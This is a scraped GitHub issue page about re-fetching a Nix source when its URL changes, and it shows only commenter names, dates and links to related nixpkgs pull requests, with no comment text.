singularity: 4.1.2 -> 4.1.3 NixOS/nixpkgs#310186

Merged

13 tasks

tobiasBora mentioned this issue May 10, 2024

fetchgit with leaveDotGit = true is still not completely deterministic NixOS/nixpkgs#8567

Open

risicle mentioned this issue May 20, 2024

add force-build-new-FODs.sh maintainer script NixOS/nixpkgs#313248

Open

13 tasks

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

re-fetch source when url changes #969

re-fetch source when url changes #969

magnetophon commented Jul 13, 2016

domenkozar commented Jul 13, 2016

copumpkin commented Jul 13, 2016

magnetophon commented Jul 13, 2016

copumpkin commented Jul 13, 2016

magnetophon commented Jul 13, 2016

veprbl commented Jul 17, 2016

domenkozar commented Jul 21, 2016

freeman42x commented Feb 3, 2018

stale bot commented Feb 15, 2021

hab25 commented Dec 22, 2023

tobiasBora commented Feb 12, 2024 •

edited

Loading

lolbinarycat commented Mar 7, 2024

tobiasBora commented Apr 29, 2024 •

edited

Loading

oxij commented May 6, 2024 via email

tobiasBora commented May 6, 2024 •

edited

Loading

oxij commented May 6, 2024 via email

tobiasBora commented May 7, 2024 •

edited

Loading

oxij commented May 7, 2024 via email

tobiasBora commented May 10, 2024 •

edited

Loading

oxij commented May 15, 2024 via email

nixos-discourse commented May 20, 2024

tobiasBora commented May 21, 2024 •

edited

Loading

re-fetch source when url changes #969

re-fetch source when url changes #969

Comments

magnetophon commented Jul 13, 2016

domenkozar commented Jul 13, 2016

copumpkin commented Jul 13, 2016

magnetophon commented Jul 13, 2016

copumpkin commented Jul 13, 2016

magnetophon commented Jul 13, 2016

veprbl commented Jul 17, 2016

domenkozar commented Jul 21, 2016

freeman42x commented Feb 3, 2018

stale bot commented Feb 15, 2021

hab25 commented Dec 22, 2023

tobiasBora commented Feb 12, 2024 • edited Loading

lolbinarycat commented Mar 7, 2024

tobiasBora commented Apr 29, 2024 • edited Loading

oxij commented May 6, 2024 via email

tobiasBora commented May 6, 2024 • edited Loading

oxij commented May 6, 2024 via email

tobiasBora commented May 7, 2024 • edited Loading

oxij commented May 7, 2024 via email

tobiasBora commented May 10, 2024 • edited Loading

oxij commented May 15, 2024 via email

nixos-discourse commented May 20, 2024

tobiasBora commented May 21, 2024 • edited Loading

tobiasBora commented Feb 12, 2024 •

edited

Loading

tobiasBora commented Apr 29, 2024 •

edited

Loading

tobiasBora commented May 6, 2024 •

edited

Loading

tobiasBora commented May 7, 2024 •

edited

Loading

tobiasBora commented May 10, 2024 •

edited

Loading

tobiasBora commented May 21, 2024 •

edited

Loading